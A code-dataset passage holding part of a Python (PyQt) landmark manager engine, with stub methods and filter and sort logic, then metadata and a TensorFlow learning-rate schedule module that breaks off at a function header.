the timing cannot be determined.
There may be one or more landmark identifiers in the \a landmarkIds list.'''
categoriesAdded = pyqtSignal(list)
'''This signal is emitted some time after a set of categories has been added to the datastore
managed by this engine and where the \l dataChanged() signal was not emitted for those changes.
As it is possible that other processes(or other devices) may
have added the landmarks, the exact timing cannot be determined.
There may be one or more category identifiers in the \a categoryIds list.'''
categoriesChanged = pyqtSignal(list)
'''This signal is emitted some time after a set of categories have been modified in the datastore
managed by the engine and where the \l dataChanged() signal was not emitted for those changes.
As it is possible that other processes(or other devices) may have modified the categories,
the timing cannot be determined.
There may be one or more category identifiers in the \a categoryIds list.'''
categoriesRemoved = pyqtSignal(list)
'''This signal is emitted some time after a set of categories have been removed from the datastore
managed by this engine and where the \l dataChanged() signal was not emitted for those changes.
As it is possible that other processes(or other devices) may have removed the categories,
the timing cannot be determined.
There may be one or more category identifiers in the \a categoryIds list.'''
def __init__(self):
QObject.__init__(self, None)
def managerName(self):
'''
Returns the manager name for this QLandmarkManagerEngine
@rtype: str
'''
return "base"
def managerParameters(self):
'''
Returns the parameters with which this engine was constructed. Note that
the engine may have discarded unused or invalid parameters at the time of
construction, and these will not be returned.
@rtype: dict
'''
return {}
def managerUri(self):
'''
Returns the unique URI of this manager, which is built from the manager name and the parameters
used to construct it.
@rtype: basestring
'''
return LandmarkManager.buildUri(self.managerName(),
self.managerParameters(),
self.managerVersion())
def managerVersion(self):
'''
Returns the engine backend implementation version number
@rtype: int
'''
return 0
def landmarkIds(self, filter_, limit, offset, sortOrders, error=0,
errorString=""):
'''
Returns a list of landmark identifiers which match the given \a filter and are sorted according to
the given \a sortOrders. The \a limit defines the maximum number of landmark IDs to return and the
\a offset defines the index offset of the first landmark ID.
A \a limit of -1 means that IDs of all matching landmarks should be returned.
Any error which occurs will be saved in \a error and \a errorString.
@param filter_: A filer
@type filter_: LandmarkFilter
@param limit: Limit the results
@type limit: int
@param offset: Offset
@type offset: int
@param sortOrders: A list of SortOrders
@type sortOrders: list
@param error: Unused error ref
@type error: int
@param errorString: Unused errorString
@type errorString: str
@rtype: list
'''
return []
def categoryIds(self, limit, offset, nameSort, error=0, errorString=""):
'''
Returns a list of category identifiers
The \a limit defines the maximum number of IDs to return and the \a offset defines the index offset
of the first ID. A \a limit of -1 means IDs for all categories should be returned.
Any error which occurs will be saved in \a error and \a errorString.
The identifiers are returned in order according to the given \a nameSort.
@param limit: Result limit
@type limit: int
@param offset: Offsets the result
@type offset: int
@param nameSort: LandmarkSort param
@type nameSort: LandmarkSort
@param error: Unused Error param
@type error: int
@param errorString: Unused error param
@type errorString: str
@rtype: list
'''
return []
def landmark(self, landmarkId, error=0, errorString=""):
'''
Returns the landmark in the datastore identified by \a landmarkId.
Any errors encountered are stored in \a error and \a errorString.
The \a error is set to QLandmarkManager::LandmarkDoesNotExistError if the landmark could not be found.
@param landmarkId: A landmark
@type landmarkId: LandmarkId
@param error: Unused Error param
@type error: int
@param errorString: Unused ErrorString param
@type errorString: str
@rtype: Landmark
'''
return Landmark()
def landmarks(self, idsOrFilter, errorMapOrSortOrder={}, error=0, errorString=""):
'''
Returns a list of landmarks which match the given \a landmarkIds. The engine will populate \a errorMap
(the map of indices of the \a landmarkIds list to errors) for the indexes where the landmark could not
be retrieved.
Overall operation errors are stored in \a error and
\a errorString. \a error is set to QLandmarkManager::NoError,
all landmarks were successfully retrieved.
@param landmarkIds: A list/tuple of Ids
@type landmarkIds: list
@param errorMap: Unused dict of errors
@type errorMap: dict
@param error: Unused Error param
@type error: int
@param errorString: Unused errorString param
@type errorString: str
@rtype: list
'''
return []
def category(self, categoryId, error=0, errorString=""):
'''
Returns the category in the datastore identified by \a categoryId.
Any errors encountered are stored in \a error and \a errorString.
A QLandmarkManager::CategoryDoesNotExist error is set if the category could not be found.
@param categoryId: The id
@type categoryId: LandmarkCategoryId
@rtype: LandmarkCategory
'''
return LandmarkCategory()
def categories(self, idsOrLimit, offset=0, nameSort=None, error=0, errorString=""):
'''
Returns a list of categories which match the given \a categoryIds. The engine will populate \a errorMap
(the map of indices of the \a categoryIds list to errors) for the indexes where the category could not
be retrieved.
Overall operation errors are stored in \a error and
\a errorString. \a error is set to QLandmarkManager::NoError, if
all categories were successfully retrieved.
@param idsOrLimit: ids or a limit
@type idsOrLimit: list or int
@param offset: An offset
@type offset: int
@param nameSort: sortOrder
@type nameSort: LandmarkSortOrder
@rtype: list
'''
return []
def saveLandmark(self, landmark, error=0, errorString=""):
'''
Adds the given \a landmark to the datastore if \a landmark has a
default-constructed identifier, or an identifier with the manager
URI set to the URI of this manager and an empty id.
If the manager URI of the identifier of the \a landmark is neither
empty nor equal to the URI of this manager, or the id member of the
identifier is not empty, but does not exist in the manager,
the operation will fail and \a error will be set to
\c QLandmarkManager::LandmarkDoesNotExistError.
Alternatively, the function will update the existing landmark in the
datastore if \a landmark has a non-empty id and currently exists
within the datastore.
Returns false on failure or true on success. On successful save
of a landmark with an empty id, it will be assigned a valid
id and have its manager URI set to the URI of this manager.
The engine must emit the appropriate signals to inform clients of changes
to the datastore resulting from this operation.
Any errors encountered during this operation should be stored in
\a error and \a errorString.
@param landmark: The Landmark
@type landmark: Landmark
@rtype: bool
'''
return False
def saveLandmarks(self, landmarks, errorMap={}, error=0, errorString=""):
'''
Adds the list of \a landmarks to the datastore.
Returns true if the landmarks were saved successfully, otherwise returns
false.
The engine will populate \a errorMap (the map of indices of the
\a landmarks list to errors) for every index for which the landmark could not be
saved.
For each newly saved landmark that was successful, the identifier
of the landmark will be updated with a new value.
The engine emits the appropriate signals to inform clients of changes
to the datastore resulting from this operation.
Overall operation errors are stored in \a error and
\a errorString. \a error is set to QLandmarkManager::NoError,
if all \a landmarks were successfully saved.
@param landmarks: List of Landmarks
@type landmarks: list
@rtype: bool
'''
return False
def removeLandmark(self, landmarkId, error=0, errorString=""):
'''
Remove the landmark identified by \a landmarkId from the datastore.
Returns true if the landmark was removed successfully, otherwise
returns false.
The engine emits the appropriate signals to inform clients of changes
to the datastore resulting from this operation.
Any errors encountered during this operation should be stored to
\a error and \a errorString.
@param landmarkId: The id
@type landmarkId: LandmarkId
@rtype: bool
'''
return False
def removeLandmarks(self, landmarkIds, errorMap={}, error=0,
errorString=""):
'''
Removes every landmark whose identifier is contained in the list
of \a landmarkIds. Returns true if all landmarks were removed
successfully, otherwise false.
The engine populates \a errorMap (the map of indices of the
\a landmarkIds list to errors) for every index for which the landmark could not be
removed.
The engine also emits the appropriate signals to inform clients of changes
to the datastore resulting from this operation.
Overall operation errors are stored in \a error and
\a errorString. \a error is set to QLandmarkManager::NoError, if
all landmarks were successfully removed.
@param landmarkIds: List of Ids
@type landmarkIds: list
@rtype: bool
'''
return False
def saveCategory(self, category, error=0, errorString=""):
'''
Adds the given \a category to the datastore if \a category has a
default-constructed identifier, or an identifier with the manager
URI set to the URI of this manager and an empty id.
If the manager URI of the identifier of the \a category is neither
empty nor equal to the URI of this manager, or the id member of the
identifier is not empty, but does not exist in the manager,
the operation should fail and \a error should be set to
\c QLandmarkManager::CategoryDoesNotExistError.
Alternatively, the function should update the existing category in the
datastore if \a category has a non-empty id and currently exists
within the datastore.
Returns false on failure or true on success. On successful save
of a category with an invalid id, it should be assigned a valid
id and have its manager URI set to the URI of this manager.
The engine returns the appropriate signals to inform clients of changes
to the datastore resulting from this operation.
Overall operation errors should be stored in \a error and
\a errorString.
@param category: LandmarkCatgory
@type category: LandmarkCatgory
@rtype: bool
'''
return False
def removeCategory(self, categoryId, error=0, errorString=''):
'''
Removes the category identified by \a categoryId from the datastore.
Returns true if the category was removed successfully, otherwise
returns false.
The engine emits the appropriate signals to inform clients of changes
to the datastore resulting from this operation
Overall operational errors are stored in \a error and
\a errorString.
@param categoryId: The id
@type categoryId: LandmarkCategoryId
@rtype: bool
'''
return False
def importLandmarks(self, device, format, option, categoryId, error=0, errorString=""):
'''
Reads landmarks from the given \a device and saves them. The data from the \a device
is expected to adhere to the provided \a format. If no \a format is provided,
the manager engine tries to autodetect the \a format.
The \a option can be used to control whether categories in the imported
file will be added during the import. If the \c AttachSingleCategory option is used, then
all the landmarks in the import file are assigned to the category identified by
\a categoryId, in all other circumstances \a categoryId is ignored. If \a categoryId
doesn't exist when using \c AttachSingleCategory, QLandmarkManager::CategoryDoesNotExist error is returned. Note that
some file formats may not support categories at all.
Returns true if all landmarks could be imported, otherwise returns false.
Overall operational errors are stored in \a error and
\a errorString.
@param device: The device for reading or a string as filename
@type device: QIODevice
@param format_: Format String
@type format_: str
@param option: Transfer Option @see TransportOption Enum
@type option: int
@param categoryId: The CategoryId
@type categoryId: LandmarkCategoryId
@rtype: bool
'''
return False
def exportLandmarks(self, device, format, landmarkIds, option, error=0,
errorString=""):
'''
Writes landmarks to the given \a device. The landmarks will be written
according to the specified \a format. If \a landmarkIds is empty, then
all landmarks will be exported, otherwise only those landmarks that
match \a landmarkIds will be exported.
The \a option can be used to control whether categories will be exported or not.
Note that the \c AttachSingleCategory option has no meaning during
export and the manager will export as if \a option was \c IncludeCategoryData.
Also, be aware that some file formats may not support categories at all and for
these formats, the \a option is always treated as if it was \c ExcludeCategoryData.
Returns true if all specified landmarks were successfully exported,
otherwise returns false.
Overall operation errors are stored in \a error and
\a errorString.
@param device: The device for writing or a string as filename
@type device: QIODevice
@param format_: Format String
@type format_: str
@param option: Transfer Option @see TransportOption Enum
@type option: int
@param categoryId: The CategoryId
@type categoryId: LandmarkCategoryId
@rtype: bool
'''
return False
def supportedFormats(self, operation, error=0, errorString=""):
'''
Returns the supported file formats for the given transfer \a operation, i.e. import or export.
Errors are stored in \a error and \a errorString.
@see: TransferOperation Enum
@param operation: Type of operation as int
@type operation: int
@rtype: list
'''
return []
def filterSupportLevel(self, filter_, error=0, errorString=""):
'''
Returns the support level the manager engine provides for the given \a filter. Errors are stored in \a error
and \a errorString.
@param filter_:
@type filter_:
@param error:
@type error:
@param errorString:
@type errorString:
@rtype: int
'''
raise NotImplementedError("Please implement filterSupportLevel()")
def sortOrderSupportLevel(self, sortOrder, error=0, errorString=""):
'''
Returns the support level the manager engine provides for the given \a sortOrder. Errors are stored in \a error
and \a errorString.
@param sortOrder:
@type sortOrder:
@param error:
@type error:
@param errorString:
@type errorString:
@rtype: int
'''
raise NotImplementedError("Please implement sortOrderSupportLevel()")
def isFeatureSupported(self, feature, error=0, errorString=""):
'''
Returns true if the manager engine supports the given \a feature, otherwise returns false; Errors are stored in
\a error and \a errorString.
@param feature:
@type feature:
@param error:
@type error:
@param errorString:
@type errorString:
@rtype: int
'''
raise NotImplementedError("Please implement isFeatureSupported()")
def isReadOnly(self, landmarkOrCategoryId=None, error=0, errorString=""):
'''
Returns true if the manager engine is exclusively read only. Meaning
landmarks and categories cannot be added, modified or removed. Errors are stored in \a error and \a errorString.
@param error:
@type error:
@param errorString:
@type errorString:
@rtype: bool
'''
raise NotImplementedError("Please implement isReadOnly()")
def searchableLandmarkAttributeKeys(self, error=0, errorString=""):
'''
Returns the list of landmark attribute keys that may be used in a QLandmarkAttributeFilter.
Errors are stored in \a error and \a errorString.
'''
raise NotImplementedError("Please implement searchableLandmarkAttributeKeys()")
def requestDestroyed(self, request):
'''
Notifies the manager engine that the given \a request has been destroyed.
@param request: The request
@type request: LandmarkAbstractRequest
'''
pass
def startRequest(self, request):
'''
Asks the manager engine to begin the given \a request
which is currently in a re(startable) state.
Returns true if the request was started successfully,
else returns false.
@param request: The request
@type request: LandmarkAbstractRequest
@rtype: bool
'''
return False
def cancelRequest(self, request):
'''
Asks the manager engine to cancel the given \a request which was
previously started and is currently in a cancellable state.
Returns true if cancelation of the request was started successfully,
otherwise returns false.
@param request: The request
@type request: LandmarkAbstractRequest
@rtype: bool
'''
return False
def waitForRequestFinished(self, request, msecs):
'''
Blocks until the manager engine has completed the given \a request
which was previously started, or until \a msecs milliseconds have passed.
Returns true if the request was completed, and false if the request was not in the
\c QLandmarkAbstractRequest::Active state, no progress could be reported or
if the engine does not support waitForFinished functionality.
@param request: The request
@type request: LandmarkAbstractRequest
@param msecs: The milliseconds
@type msecs: int
@rtype: bool
'''
return False
@staticmethod
def updateRequestState(req, state):
'''
Updates the given asynchronous request \a req by setting the new \a state
of the request. If the new state is different, the stateChanged() signal will be emitted
by the request.
@param req: The request
@type req: LandmarkAbstractRequest
@param state: LandmarkAbstractRequest.State Enum
@type state: int
'''
if req:
ml = QMutexLocker(req._mutex)
if req._state != state:
req._state = state
ml.unlock()
req.stateChanged.emit(state)
@staticmethod
def updateLandmarkIdFetchRequest(req, result, error, errorString,
newState, resultProperty='_landmarkIds'):
'''
Updates the given QLandmarkIdFetchRequest \a req with the latest \a result,
and operation \a error and \a errorString. In addition, the state of the request
will be changed to \a newState.
It then causes the request to emit its resultsAvailable() signal to notify clients of the
request progress.
If the new request state is different from the previous state, the stateChanged() signal will
also be emitted from the request.
@param req: LandmarkIdFetchRequest
@type req: LandmarkIdFetchRequest
@param result: List of results
@type result: list
@param error: Unused
@type error: int
@param errorString: Unused
@type errorString: str
@param newState: Unused
@type newState: int
'''
if req:
ireq = req
ml = QMutexLocker(req._mutex)
req._error = error
req._errorString = errorString
if resultProperty:
req.__setattr__(resultProperty, result)
emitState = (req._state != newState)
req._state = newState
ml.unlock()
req.resultsAvailable.emit()
if emitState and ireq:
ireq.stateChanged.emit(newState)
@staticmethod
def updateLandmarkFetchRequest(req, result, error, errorString,
newState):
'''
Updates the given QLandmarkFetchRequest \a req with the latest \a result,
and operation \a error and \a errorString. In addition, the state of the request
will be changed to \a newState.
It then causes the request to emit its resultsAvailable() signal to notify clients of the
request progress.
If the new request state is different from the previous state, the stateChanged() signal will
also be emitted from the request.
@param req: LandmarkFetchRequest
@type req: LandmarkFetchRequest
@param result: List of results
@type result: list
@param error: Unused
@type error: int
@param errorString: Unused
@type errorString: str
@param newState: Unused
@type newState: int
'''
return LandmarkManagerEngine.updateLandmarkIdFetchRequest(req, result, error,
errorString, newState,
'_landmarks')
@staticmethod
def updateLandmarkFetchByIdRequest(req, result, error,
errorString, newState):
'''
Updates the given QLandmarkFetchByIdRequest \a req with the latest \a result,
operation \a error and \a errorString and map of input index to individual errors, \a errorMap.
In addition, the state of the request
will be changed to \a newState.
It then causes the request to emit its resultsAvailable() signal to notify clients of the
request progress.
If the new request state is different from the previous state, the stateChanged() signal will
also be emitted from the request.
@param req: LandmarkFetchByIdRequest
@type req: LandmarkFetchByIdRequest
@param result: List of results
@type result: list
@param error: Unused
@type error: int
@param errorString: Unused
@type errorString: str
@param newState: Unused
@type newState: int
'''
return LandmarkManagerEngine.updateLandmarkIdFetchRequest(req, result, error,
errorString, newState,
'_landmarks')
@staticmethod
def updateLandmarkRemoveRequest(req, error, errorString, errorMap,
newState):
'''
Updates the given QLandmarkRemoveRequest \a req with the operation \a error and
\a errorString and map of input index to individual errors, \a errorMap. In addition,
the state of the request will be changed to \a newState.
It then causes the request to emit its resultsAvailable() signal to notify clients of the request
progress.
If the new request state is different from the previous state, the stateChanged() signal will
also be emitted from the request.
@param req: LandmarkRemoveRequest
@type req: LandmarkRemoveRequest
@param result: List of results
@type result: list
@param error: Unused
@type error: int
@param errorString: Unused
@type errorString: str
@param errorMap: Unused
@type errorMap: dict
@param newState: Unused
@type newState: int
'''
return LandmarkManagerEngine.updateLandmarkIdFetchRequest(req, None, error,
errorString, newState,
'')
@staticmethod
def updateLandmarkSaveRequest(req, result, error, errorString,
errorMap, newState):
'''
Updates the given QLandmarkSaveRequest \a req with the latest \a result, operation \a error
and \a errorString, and map of input index to individual errors, \a errorMap.
In addition, the state of the request will be changed to \a newState.
It then causes the request to emit its resultsAvailable() signal to notify clients of the request
progress.
If the new request state is different from the previous state, the stateChanged() signal will
also be emitted from the request.
@param req: LandmarkSaveRequest
@type req: LandmarkSaveRequest
@param result: List of results
@type result: list
@param error: Unused
@type error: int
@param errorString: Unused
@type errorString: str
@param errorMap: Unused
@type errorMap: dict
@param newState: Unused
@type newState: int
'''
return LandmarkManagerEngine.updateLandmarkIdFetchRequest(req, result, error,
errorString, newState,
'_landmarks')
@staticmethod
def updateLandmarkCategoryIdFetchRequest(req, result, error,
errorString, newState):
'''
Updates the given QLandmarkCategoryIdFetchRequest \a req with the latest \a result,
and operation \a error and \a errorString. In addition, the state of the request
will be changed to \a newState.
It then causes the request to emit its resultsAvailable() signal to notify clients of the
request progress.
If the new request state is different from the previous state, the stateChanged() signal will
also be emitted from the request.
@param req: LandmarkCategoryIdFetchRequest
@type req: LandmarkCategoryIdFetchRequest
@param result: List of results
@type result: list
@param error: Unused
@type error: int
@param errorString: Unused
@type errorString: str
@param newState: Unused
@type newState: int
'''
return LandmarkManagerEngine.updateLandmarkIdFetchRequest(req, result, error,
errorString, newState,
'_categoryIds')
@staticmethod
def updateLandmarkCategoryFetchRequest(req, result, error, errorString,
newState):
'''
Updates the given QLandmarkCategoryFetchRequest \a req with the latest \a result,
and operation \a error and \a errorString. In addition, the state of the request
will be changed to \a newState.
It then causes the request to emit its resultsAvailable() signal to notify clients of the
request progress.
If the new request state is different from the previous state, the stateChanged() signal will
also be emitted from the request.
@param req: LandmarkCategoryFetchRequest
@type req: LandmarkCategoryFetchRequest
@param result: List of results
@type result: list
@param error: Unused
@type error: int
@param errorString: Unused
@type errorString: str
@param newState: Unused
@type newState: int
'''
return LandmarkManagerEngine.updateLandmarkIdFetchRequest(req, result,
error,
errorString,
newState,
'_categories')
@staticmethod
def updateLandmarkCategoryFetchByIdRequest(req, result, error,
errorString, errorMap,
newState):
'''
Updates the given QLandmarkCategoryFetchByIdRequest \a req with the latest \a result,
and operation \a error and \a errorString, and map of input index to individual errors, \a errorMap.
In addition, the state of the request will be changed to \a newState.
It then causes the request to emit its resultsAvailable() signal to notify clients of the
request progress.
If the new request state is different from the previous state, the stateChanged() signal will
also be emitted from the request.
@param req: LandmarkCategoryFetchByIdRequest
@type req: LandmarkCategoryFetchByIdRequest
@param result: List of results
@type result: list
@param error: Unused
@type error: int
@param errorString: Unused
@type errorString: str
@param errorMap: Unused
@type errorMap: dict
@param newState: Unused
@type newState: int
'''
return LandmarkManagerEngine.updateLandmarkIdFetchRequest(req, result,
error,
errorString,
newState,
'_categories')
@staticmethod
def updateLandmarkCategoryRemoveRequest(req, error, errorString,
errorMap, newState):
'''
Updates the given QLandmarkCategoryRemoveRequest \a req with the operation \a error and
\a errorString and map of input index to individual errors, \a errorMap. In addition,
the state of the request will be changed to \a newState.
It then causes the request to emit its resultsAvailable() signal to notify clients of the request
progress.
If the new request state is different from the previous state, the stateChanged() signal will
also be emitted from the request.
        @param req: LandmarkCategoryRemoveRequest
        @type req: LandmarkCategoryRemoveRequest
@param error: Unused
@type error: int
@param errorString: Unused
@type errorString: str
@param errorMap: Unused
@type errorMap: dict
@param newState: Unused
@type newState: int
'''
return LandmarkManagerEngine.updateLandmarkIdFetchRequest(req, None,
error,
errorString,
newState,
'')
@staticmethod
def updateLandmarkCategorySaveRequest(req, result, error, errorString,
errorMap, newState):
'''
        Updates the given QLandmarkCategorySaveRequest \a req with the latest \a result, operation \a error
and \a errorString, and map of input index to individual errors, \a errorMap.
In addition, the state of the request will be changed to \a newState.
It then causes the request to emit its resultsAvailable() signal to notify clients of the request
progress.
If the new request state is different from the previous state, the stateChanged() signal will
also be emitted from the request.
@param req: LandmarkCategorySaveRequest
@type req: LandmarkCategorySaveRequest
@param result: List of results
@type result: list
@param error: Unused
@type error: int
@param errorString: Unused
@type errorString: str
@param errorMap: Unused
@type errorMap: dict
@param newState: Unused
@type newState: int
'''
return LandmarkManagerEngine.updateLandmarkIdFetchRequest(req, result,
error,
errorString,
newState,
'_categories')
@staticmethod
def updateLandmarkImportRequest(req, result, error, errorString,
newState):
'''
Updates the given QLandmarkImportRequest \a req with the operation \a error and \a errorString.
In addition the state of the request is changed to \a newState. This function may also be used
to update the \a ids of the landmarks which have been imported.
It then causes the request to emit its resultsAvailable() signal to notify the clients of the request
progress.
If the new request state is different from the previous state, the stateChanged() signal will
also be emitted from the request.
@param req: LandmarkImportRequest
@type req: LandmarkImportRequest
@param result: List of results
@type result: list
@param error: Unused
@type error: int
@param errorString: Unused
@type errorString: str
@param newState: Unused
@type newState: int
'''
return LandmarkManagerEngine.updateLandmarkIdFetchRequest(req, result,
error,
errorString,
newState,
'_landmarkIds')
@staticmethod
def updateLandmarkExportRequest(req, error, errorString, newState):
'''
Updates the given QLandmarkExportRequest \a req with the operation \a error and \a errorString.
In addition the state of the request is changed to \a newState.
It then causes the request to emit its resultsAvailable() signal to notify the clients of the request
progress.
If the new request state is different from the previous state, the stateChanged() signal will
also be emitted from the request.
@param req: LandmarkExportRequest
@type req: LandmarkExportRequest
        @param error: Unused
        @type error: int
        @param errorString: Unused
        @type errorString: str
@param newState: Unused
@type newState: int
'''
return LandmarkManagerEngine.updateLandmarkIdFetchRequest(req, None,
error,
errorString,
newState,
'')
@staticmethod
def compareLandmark(a, b, sortOrders):
'''
Compares two landmarks (\a a and \a b) using the given list of \a sortOrders. Returns a negative number if \a a should appear
before \a b according to the sort order, a positive number if \a a should appear after \a b according to the sort order,
and zero if the two are unable to be sorted.
@param a: Landmark 1
@type a: Landmark
@param b: Landmark 2
@type b: Landmark
@param sortOrders: List of LandmarkSortOrder Objects
@type sortOrders: list
@rtype: int
'''
comparison = 0
        for sortOrder in sortOrders:
            if sortOrder.type_() == LandmarkSortOrder.NameSort:
                comparison = LandmarkManagerEngine.compareName(a, b, sortOrder)
            else:
                comparison = 0
            # a tie (zero) falls through to the next sort order in the list,
            # matching the behaviour described in addSorted's docstring
            if comparison != 0:
                break
return comparison
@staticmethod
def compareName(a, b, nameSort):
'''
Compares two landmarks (\a a and \a b) by name.
Returns a negative number if \a a should appear before \a b according to the \a nameSort,
a positive number if \a a should appear after \a b according to the \a nameSort,
and zero if the two are unable to be sorted.
Assuming an ascending order sort, an integer less than, equal to, or greater than zero
is returned if \a a is less than, equal to or greater than \a b.
\a nameSort specifies whether an ascending or descending order is used and whether
the sort is case sensitive or not.
@param a: Landmark 1
@type a: Landmark
@param b: Landmark 2
@type b: Landmark
@param nameSort: LandmarkNameSort
@type nameSort: LandmarkNameSort
@rtype: int
'''
result = QString.compare(QString.fromUtf8(a.name()),
QString.fromUtf8(b.name()),
nameSort.caseSensitivity())
if nameSort.direction() == Qt.DescendingOrder:
result *= -1
return result
@staticmethod
def addSorted(sorted_, landmark, sortOrders):
'''
        Inserts \a landmark into the \a sorted list via an insertion sort, according to the provided \a sortOrders list.
The first QLandmarkSortOrder in the list has the highest priority; if the \a landmark is deemed equal to another
in the \a sorted list, the second QLandmarkSortOrder in the list is used (and so on until either the landmark is inserted
or there are no more sort order objects in the list).
@param sorted_: The sorted list of Landmark(s)
@type sorted_: list
@param landmark: the landmark which will be inserted
@type landmark: Landmark
@param sortOrders: list of sortOrders
@type sortOrders: LandmarkSortOrder
'''
if len(sortOrders) > 0:
for i in range(len(sorted_)):
comparison = LandmarkManagerEngine.compareLandmark(sorted_[i],
landmark,
sortOrders)
if comparison > 0:
sorted_.insert(i, landmark)
return
#hasn't been inserted yet? append to the list.
sorted_.append(landmark)
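    # A small illustration of the intended use of addSorted (the names below
    # are hypothetical, not defined in this module):
    #
    #     ordered = []
    #     for lm in landmarks:
    #         LandmarkManagerEngine.addSorted(ordered, lm, [nameSort])
    #     # `ordered` now holds the landmarks in nameSort order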
@staticmethod
def testFilter(filter_, landmark):
'''
Returns true if the supplied \a landmark matches the supplied \a filter.
@param filter_: The filter to matches
@type filter_: LandmarkFilter
@param landmark: The landmark to test
@type landmark: Landmark
@rtype: bool
'''
filterType = filter_.type_()
if filterType == LandmarkFilter.DefaultFilter:
return True
elif filterType == LandmarkFilter.AttributeFilter:
filterKeys = filter_.attributeKeys()
if filter_.operationType() == LandmarkAttributeFilter.AndOperation:
lmAttributeValue = QVariant()
for filterKey in filterKeys:
if filterKey in commonLandmarkKeys:
lmAttributeValue = getLandmarkAttribute(filterKey,
landmark)
if lmAttributeValue.type() == QVariant.String:
lmString = lmAttributeValue.toString()
attribString = filter_.attribute(filterKey).toString()
if matchString(lmString, attribString,
filter_.matchFlags(filterKey)):
continue
elif filter_.attribute(filterKey) == lmAttributeValue:
continue
return False
else:
return False
return True
else: #Must be Or Operation
lmAttributeValue = QVariant()
for filterKey in filterKeys:
if filterKey in commonLandmarkKeys:
lmAttributeValue = getLandmarkAttribute(filterKey,
landmark)
if lmAttributeValue.type() == QVariant.String:
lmString = lmAttributeValue.toString()
attribString = filter_.attribute(filterKey).toString()
if matchString(lmString, attribString,
filter_.matchFlags(filterKey)):
return True
elif filter_.attribute(filterKey) == lmAttributeValue:
return True
return False
elif filterType == LandmarkFilter.BoxFilter:
if not filter_.boundingBox().isValid():
return False
tly = filter_.boundingBox().topLeft().latitude()
bry = filter_.boundingBox().bottomRight().latitude()
tlx = filter_.boundingBox().topLeft().longitude()
brx = filter_.boundingBox().bottomRight().longitude()
latWrap = (tly < bry)
longWrap = (tlx > brx)
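            # longWrap means the box crosses the 180th meridian (top-left
            # longitude numerically greater than bottom-right), so the
            # longitude containment test further below is inverted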
if latWrap:
return False
            # check if the landmark is outside the box's latitude band
            if landmark.coordinate().latitude() < bry or landmark.coordinate().latitude() > tly:
                return False
lmx = landmark.coordinate().longitude()
if longWrap:
if ((lmx > 0.0) and (lmx<= tlx)) or ((lmx < 0.0) and (lmx >= brx)):
return False
else:
if lmx < tlx or lmx > brx:
                    return False
#landmark must be within the bounds to reach here.
return True
elif filterType == LandmarkFilter.CategoryFilter:
categories = landmark.categoryIds()
for categoryId in categories:
if filter_.categoryId() == categoryId:
return True
return False
elif filterType == LandmarkFilter.IntersectionFilter:
terms = filter_.filters()
if len(terms) == 0:
return False
for term in terms:
if not LandmarkManagerEngine.testFilter(term, landmark):
return False
return True
elif filterType == LandmarkFilter.LandmarkIdFilter:
ids = filter_.landmarkIds()
for id_ in ids:
if id_ == landmark.landmarkId():
return True
return False
elif filterType == LandmarkFilter.InvalidFilter:
return False
elif filterType == LandmarkFilter.NameFilter:
return matchString(landmark.name(), filter_.name(),
filter_.matchFlags())
elif filterType == LandmarkFilter.ProximityFilter:
distance = filter_.center().distanceTo(landmark.coordinate())
if distance < filter_.radius() or distance == filter_.radius():
return True
else:
return False
elif filterType == LandmarkFilter.UnionFilter:
terms = filter_.filters()
if len(terms) == 0:
return False
else:
for term in terms:
                if LandmarkManagerEngine.testFilter(term, landmark):
return True
return False
return False
@staticmethod
def sortLandmarks(landmarks, sortOrders):
'''
Sorts the given list of \a landmarks according to the provided \a sortOrders
@param landmarks: The landmarks
@type landmarks: list
@param sortOrders: The orders
@type sortOrders: list
@return: A List with LandmarkIds!
@rtype: list
'''
landmarkIds = []
sortedLandmarks = []
if len(sortOrders):
for landmark in landmarks:
LandmarkManagerEngine.addSorted(sortedLandmarks, landmark,
sortOrders)
for landmark in sortedLandmarks:
                landmarkIds.append(landmark.landmarkId())
else:
for landmark in landmarks:
landmarkIds.append(landmark.landmarkId())
return landmarkIds
|
mit
| 41,353,620,293,936,170 | 40.138825 | 134 | 0.594545 | false |
tensorflow/tpu
|
models/official/detection/modeling/learning_rates.py
|
1
|
3708
|
# Lint as: python2, python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Learning rate schedule."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import numpy as np
from six.moves import zip
import tensorflow.compat.v1 as tf
def step_learning_rate_with_linear_warmup(global_step,
init_learning_rate,
warmup_learning_rate,
warmup_steps,
learning_rate_levels,
learning_rate_steps):
"""Creates the step learning rate tensor with linear warmup."""
linear_warmup = (warmup_learning_rate +
tf.cast(global_step, dtype=tf.float32) / warmup_steps *
(init_learning_rate - warmup_learning_rate))
learning_rate = tf.where(global_step < warmup_steps,
linear_warmup, init_learning_rate)
for next_learning_rate, start_step in zip(learning_rate_levels,
learning_rate_steps):
learning_rate = tf.where(global_step >= start_step,
next_learning_rate, learning_rate)
return learning_rate
def cosine_learning_rate_with_linear_warmup(global_step,
init_learning_rate,
warmup_learning_rate,
warmup_steps,
total_steps):
"""Creates the cosine learning rate tensor with linear warmup."""
global_step = tf.cast(global_step, dtype=tf.float32)
linear_warmup = (warmup_learning_rate + global_step / warmup_steps *
(init_learning_rate - warmup_learning_rate))
cosine_learning_rate = (
init_learning_rate * (tf.cos(
np.pi * (global_step - warmup_steps) / (total_steps - warmup_steps))
+ 1.0) / 2.0)
learning_rate = tf.where(global_step < warmup_steps,
linear_warmup, cosine_learning_rate)
return learning_rate
def learning_rate_generator(params, total_steps):
"""The learning rate function generator."""
if params.type == 'step':
return functools.partial(
step_learning_rate_with_linear_warmup,
init_learning_rate=params.init_learning_rate,
warmup_learning_rate=params.warmup_learning_rate,
warmup_steps=params.warmup_steps,
learning_rate_levels=params.learning_rate_levels,
learning_rate_steps=params.learning_rate_steps)
elif params.type == 'cosine':
return functools.partial(
cosine_learning_rate_with_linear_warmup,
init_learning_rate=params.init_learning_rate,
warmup_learning_rate=params.warmup_learning_rate,
warmup_steps=params.warmup_steps,
total_steps=total_steps)
else:
raise ValueError('Unsupported learning rate type: {}.'.format(params.type))
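# A quick self-contained sanity check of the step schedule above, replicated
# in plain Python; the hyper-parameter values below are arbitrary examples,
# not defaults taken from this module.
def _check_step_schedule_shape():
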